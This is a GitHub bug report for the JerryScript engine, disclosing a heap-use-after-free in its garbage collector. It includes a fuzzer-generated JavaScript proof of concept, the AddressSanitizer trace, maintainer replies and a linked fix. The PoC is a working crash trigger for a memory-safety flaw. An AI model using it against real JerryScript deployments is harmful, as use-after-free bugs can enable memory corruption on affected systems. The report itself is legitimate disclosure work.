Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

AddressSanitizer: heap-use-after-free jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited #4870

Open
eternalsakura opened this issue Dec 9, 2021 · 5 comments · May be fixed by #4966
Open

AddressSanitizer: heap-use-after-free jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited #4870

eternalsakura opened this issue Dec 9, 2021 · 5 comments · May be fixed by #4966
Assignees
@mnegyokru
Labels
bug Undesired behaviour

Comments

@eternalsakura
Copy link

JerryScript commit hash

55acdf2

Build platform

Ubuntu 20.04 LTS

Build steps

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

poc

async function f() {
    let arr = [0.000000];
    let fuzz_v152 = arr;
    let fuzz_v159 = fuzz_v152.__proto__;
    fuzz_v152.valueOf = function* (fuzz_v166, fuzz_v167) {
        while (arr) {
        }
        var fuzz_v172 = ~f;
        arr >>= [1.100000];
        return fuzz_v167;
    };
    arr.includes(arr, [340282346638528859811704183484516925440.000000], arr);
    delete [10];
    let fuzz_v253 = f.__proto__;
    let fuzz_v256 = {
        "D5FP8": f
    };
    arr["map"](f, new Object(true));
    arr.flat();
    let fuzz_v69 = false;
    await this;
    await f;
    var fuzz_v43 = arr -= new Date(new String({
        "findIndex": arr
    }));
    await this;
    let fuzz_v286 = Symbol.reject();
    await f;
    await new Promise(f);
    await new Promise(async function* (fuzz_v80) {
        var fuzz_v82 = new Uint32Array(fuzz_v80, arr, [1.100000], fuzz_v80, fuzz_v80);
        let fuzz_v96 = fuzz_v82.__proto__;
        this.length = 4;
    });
    await new Promise(async function* (fuzz_v138, fuzz_v139) {
        fuzz_v138.__proto__ = fuzz_v139;
        let fuzz_v147 = function* (fuzz_v149, fuzz_v150, fuzz_v151, fuzz_v152) {
            let fuzz_v165 = Reflect.apply(fuzz_v152, {
                "findIndex": fuzz_v150
            }, [{}]);
            switch ({
                    includes: fuzz_v138,
                    set valueOf(fuzz_v175) {
                        fuzz_v150.valueOf = fuzz_v175;
                        return;
                    }
                }) {
            case [1.100000]:
                throw arr;
                break;
            case 5643033980980220.000000:
                let fuzz_v203 = String.prototype.trim.call(new String());
                break;
            default:
                fuzz_v43.valueOf = fuzz_v150;
            }
            let fuzz_v214 = fuzz_v69;
            let fuzz_v223 = Number.isInteger(2147483648);
        };
        var fuzz_v228 = f;
        delete f.__proto__;
        let fuzz_v237 = {};
    });
    await new Promise(f);
    await new Promise(async function* (fuzz_v269, fuzz_v270, fuzz_v271) {
        class fuzz_class273 extends f {

        }
        return arr;
    });
    await new Promise(fuzz_v286);
}
f(f, f);

asan log

=================================================================
==2066102==ERROR: AddressSanitizer: heap-use-after-free on address 0xf4e01ba0 at pc 0x565c19c2 bp 0xffdeb558 sp 0xffdeb548
READ of size 4 at 0xf4e01ba0 thread T0
    #0 0x565c19c1 in ecma_gc_set_object_visited /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:90
    #1 0x565c474d in ecma_gc_mark_executable_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:698
    #2 0x565c5bc0 in ecma_gc_mark /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:1007
    #3 0x565c9a46 in ecma_gc_run /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2209
    #4 0x565ca303 in ecma_free_unused_memory /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2321
    #5 0x5666230f in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:285
    #6 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #7 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #8 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #9 0x56628895 in ecma_op_create_native_handler /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:716
    #10 0x56641987 in ecma_promise_create_resolving_function /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:425
    #11 0x56641aa5 in ecma_promise_run_executor /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:446
    #12 0x56641df2 in ecma_op_create_promise_object /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:516
    #13 0x56642f01 in ecma_promise_new_capability /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:766
    #14 0x56643310 in ecma_promise_reject_or_resolve /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:844
    #15 0x566442cc in ecma_promise_async_await /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:1183
    #16 0x566c2274 in vm_loop /home/sakura/jerryscript/jerry-core/vm/vm.c:2742
    #17 0x566d4684 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5260
    #18 0x566a8627 in opfunc_resume_executable_object /home/sakura/jerryscript/jerry-core/vm/opcodes.c:777
    #19 0x56630503 in ecma_process_promise_async_reaction_job /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:365
    #20 0x566311f0 in ecma_process_all_enqueued_jobs /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:569
    #21 0x565b1569 in jerry_run_jobs /home/sakura/jerryscript/jerry-core/api/jerryscript.c:1064
    #22 0x565a899d in main /home/sakura/jerryscript/jerry-main/main-jerry.c:326
    #23 0xf75ecee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
    #24 0x565a6b04 in _start (/home/sakura/jerryscript/build2/bin/jerry+0x22b04)

0xf4e01ba0 is located 0 bytes inside of 24-byte region [0xf4e01ba0,0xf4e01bb8)
freed by thread T0 here:
    #0 0xf79d5814 in __interceptor_free (/lib32/libasan.so.5+0x113814)
    #1 0x566625d9 in jmem_heap_free_block_internal /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:477
    #2 0x56662a7d in jmem_heap_free_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:691
    #3 0x566d4f02 in ecma_dealloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:125
    #4 0x565c9451 in ecma_gc_free_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2150
    #5 0x565ca0cb in ecma_gc_run /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2277
    #6 0x565ca303 in ecma_free_unused_memory /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:2321
    #7 0x5666230f in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:285
    #8 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #9 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #10 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #11 0x56642ca0 in ecma_promise_new_capability /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:742
    #12 0x56643310 in ecma_promise_reject_or_resolve /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:844
    #13 0x566442cc in ecma_promise_async_await /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-promise-object.c:1183
    #14 0x566c2274 in vm_loop /home/sakura/jerryscript/jerry-core/vm/vm.c:2742
    #15 0x566d4684 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5260
    #16 0x566a8627 in opfunc_resume_executable_object /home/sakura/jerryscript/jerry-core/vm/opcodes.c:777
    #17 0x56630503 in ecma_process_promise_async_reaction_job /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:365
    #18 0x566311f0 in ecma_process_all_enqueued_jobs /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:569
    #19 0x565b1569 in jerry_run_jobs /home/sakura/jerryscript/jerry-core/api/jerryscript.c:1064
    #20 0x565a899d in main /home/sakura/jerryscript/jerry-main/main-jerry.c:326
    #21 0xf75ecee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)

previously allocated by thread T0 here:
    #0 0xf79d5c17 in __interceptor_malloc (/lib32/libasan.so.5+0x113c17)
    #1 0x5666221f in jmem_heap_alloc /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:254
    #2 0x5666231d in jmem_heap_gc_and_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:291
    #3 0x566623b8 in jmem_heap_alloc_block /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c:324
    #4 0x566d4ed5 in ecma_alloc_extended_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-alloc.c:111
    #5 0x565e5af2 in ecma_create_object /home/sakura/jerryscript/jerry-core/ecma/base/ecma-helpers.c:94
    #6 0x56622394 in ecma_op_to_object /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-conversion.c:581
    #7 0x566fc246 in ecma_builtin_object_dispatch_call /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-object.c:116
    #8 0x566fc375 in ecma_builtin_object_dispatch_construct /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-object.c:144
    #9 0x56604101 in ecma_builtin_dispatch_construct /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1603
    #10 0x5662b36d in ecma_op_function_construct_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1585
    #11 0x5662b9ba in ecma_op_function_construct /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1773
    #12 0x566b454b in opfunc_construct /home/sakura/jerryscript/jerry-core/vm/vm.c:845
    #13 0x566d472a in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5287
    #14 0x566d4d4f in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363
    #15 0x5662a0e2 in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #16 0x5662af15 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #17 0x566dc7b8 in ecma_builtin_array_prototype_object_map /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1979
    #18 0x566e0794 in ecma_builtin_array_prototype_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:3006
    #19 0x56603c36 in ecma_builtin_dispatch_routine /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1543
    #20 0x56603e53 in ecma_builtin_dispatch_call /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1574
    #21 0x5662a353 in ecma_op_function_call_native_built_in /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1244
    #22 0x5662af31 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1444
    #23 0x5662ada6 in ecma_op_function_validated_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1402
    #24 0x566b3fb3 in opfunc_call /home/sakura/jerryscript/jerry-core/vm/vm.c:763
    #25 0x566d46e9 in vm_execute /home/sakura/jerryscript/jerry-core/vm/vm.c:5266
    #26 0x566d4d4f in vm_run /home/sakura/jerryscript/jerry-core/vm/vm.c:5363
    #27 0x5662a0e2 in ecma_op_function_call_simple /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1203
    #28 0x5662af15 in ecma_op_function_call /home/sakura/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1439
    #29 0x566dc7b8 in ecma_builtin_array_prototype_object_map /home/sakura/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:1979

SUMMARY: AddressSanitizer: heap-use-after-free /home/sakura/jerryscript/jerry-core/ecma/base/ecma-gc.c:90 in ecma_gc_set_object_visited
Shadow bytes around the buggy address:
  0x3e9c0320: 00 00 00 fa fa fa fd fd fd fd fa fa fd fd fd fa
  0x3e9c0330: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x3e9c0340: fd fd fa fa fd fd fd fa fa fa 00 00 00 fa fa fa
  0x3e9c0350: 00 00 00 fa fa fa fd fd fd fd fa fa 00 00 00 fa
  0x3e9c0360: fa fa 00 00 00 fa fa fa fd fd fd fd fa fa fd fd
=>0x3e9c0370: fd fa fa fa[fd]fd fd fa fa fa 00 00 00 fa fa fa
  0x3e9c0380: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
  0x3e9c0390: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x3e9c03a0: fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x3e9c03b0: fd fd fd fd fa fa 00 00 00 fa fa fa 00 00 00 fa
  0x3e9c03c0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2066102==ABORTING
@eternalsakura
Copy link
Author

Can you confirm if this is a valid issue? thanks :)

@rerobika
Copy link
Member

rerobika commented Dec 9, 2021

Yep, that's a valid issue.

@rerobika rerobika added the bug Undesired behaviour label Dec 9, 2021
@rerobika
Copy link
Member

rerobika commented Dec 9, 2021

However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

@eternalsakura
Copy link
Author

However, this test is a nightmare to debug. I'd definitely recommend some kind of test reduction. Please check https://github.com/renatahodovan/picire or https://github.com/renatahodovan/picireny. @hope-fly PTAL as well.

In fact, I tried to reduce this poc, but it did not work well.

I will think of some other ways, and I will communicate with you if I have gained something.

@hope-fly
Copy link

hope-fly commented Dec 9, 2021

@rerobika ok,I'll TAL tomorrow

mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
@mnegyokru
Put reference on executable object's this_binding to avoid unwanted f…
ed86b06 
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu
mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
@mnegyokru
Put reference on executable object's this_binding to avoid unwanted f…
f7bfe38 
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu
mnegyokru added a commit to mnegyokru/jerryscript that referenced this issue Jan 14, 2022
@mnegyokru
Put reference on executable object's this_binding to avoid unwanted f…
931d53a 
…rees before exiting execution

This patch fixes jerryscript-project#4870.

JerryScript-DCO-1.0-Signed-off-by: Martin Negyokru negyokru@inf.u-szeged.hu
@mnegyokru mnegyokru linked a pull request Jan 14, 2022 that will close this issue
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@mnegyokru mnegyokru

Labels
bug Undesired behaviour
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Put reference on executable object's this_binding to avoid unwanted f… mnegyokru/jerryscript
4 participants
@rerobika @eternalsakura @hope-fly @mnegyokru